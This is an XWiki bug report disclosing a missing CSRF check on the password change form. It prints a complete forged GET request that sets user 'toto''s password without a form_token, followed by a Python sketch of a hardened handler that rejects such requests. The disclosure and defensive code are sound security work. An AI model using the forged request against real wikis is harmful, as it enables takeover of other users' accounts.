XWiki Platform issue XWIKI-18315

No CSRF protection on the password change form


Details

    • Easy

    Description

      There is no protection against CSRF-type attacks on the password change form. The form_token parameter is not checked on the server side, so a request that omits this parameter entirely still changes the password.

      Provided an administrator can be tricked into issuing the request, it is therefore very easy to change the password of any user of the wiki.

      Here is an example of a request that changes a password (user toto) on the current stable version of XWiki (both the POST and the GET method work):


      GET /xwiki/bin/view/XWiki/toto?xpage=passwd&xwikipassword=aaaaaaaa&xwikipassword2=aaaaaaaa HTTP/1.1
      Host: 127.0.0.1:8080
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
      Accept-Language: en-GB,en;q=0.5
      Accept-Encoding: gzip, deflate
      Origin: http://127.0.0.1:8080
      Connection: close
      Referer: http://127.0.0.1:8080/xwiki/bin/view/XWiki/toto?xpage=passwd
      Cookie: JSESSIONID=1AC1B58E461B85FBE5E1C980197C5A64; username="XXX"; password="XXX"; rememberme="false"; validation="XXX"
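      As an added illustration of the missing server-side check (this is not XWiki's code and uses a constructed, hypothetical Session/handler model rather than XWiki's API), the following Python sketch shows what the password-change handler has to do before touching the account: refuse state changes over GET, require the form_token parameter, and compare it in constant time against the token bound to the session that rendered the form. The forged request line fed to it is the one quoted in this report; the session, token and password values are constructed for the example.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed, hypothetical stand-in for a server-side session; not XWiki's API.
class Session:
    def __init__(self):
        self.csrf_token = secrets.token_hex(16)  # per-session anti-CSRF secret
        self.password = "old-password"           # constructed starting value


def render_password_form(session):
    """Form rendering step: the hidden form_token field carries the session's token."""
    return {"form_token": session.csrf_token}


def params_from_request_line(request_line):
    """Split 'METHOD /target HTTP/1.1' into the method and its query parameters."""
    method, target, _version = request_line.split(" ", 2)
    query = urlsplit(target).query
    return method, {k: v[0] for k, v in parse_qs(query).items()}


def change_password(session, method, params):
    """Hardened handler: returns (status, message) and only mutates on success.

    The checks run in this order so that a cross-site request never reaches
    the password logic: method, token presence, token match, then input.
    """
    if method != "POST":
        return 405, "state-changing request must be POST"
    token = params.get("form_token")
    if token is None:
        return 403, "missing form_token"        # the gap this report describes
    if not hmac.compare_digest(token, session.csrf_token):
        return 403, "invalid form_token"        # constant-time compare
    p1 = params.get("xwikipassword")
    p2 = params.get("xwikipassword2")
    if not p1 or p1 != p2:
        return 400, "passwords missing or do not match"
    session.password = p1
    return 200, "password changed"


# Request line quoted in this report (the cookies would be attached by the browser).
FORGED_REQUEST_LINE = (
    "GET /xwiki/bin/view/XWiki/toto?xpage=passwd"
    "&xwikipassword=aaaaaaaa&xwikipassword2=aaaaaaaa HTTP/1.1"
)


def demo():
    """Run the forged request, the forged request as POST, and a legitimate submission."""
    session = Session()
    method, params = params_from_request_line(FORGED_REQUEST_LINE)
    results = {
        "forged_get": change_password(session, method, params),
        "forged_post_no_token": change_password(session, "POST", params),
    }
    legit = dict(params, **render_password_form(session))
    results["legit_post"] = change_password(session, "POST", legit)
    results["final_password"] = session.password
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(name, outcome)
```

      Only the submission that carries the token rendered into the form for this session succeeds; the forged GET and the same parameters re-sent as a POST without form_token are both rejected before the password is read.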


      People

        surli Simon Urli
        Ventresca Pierrick Vuillemin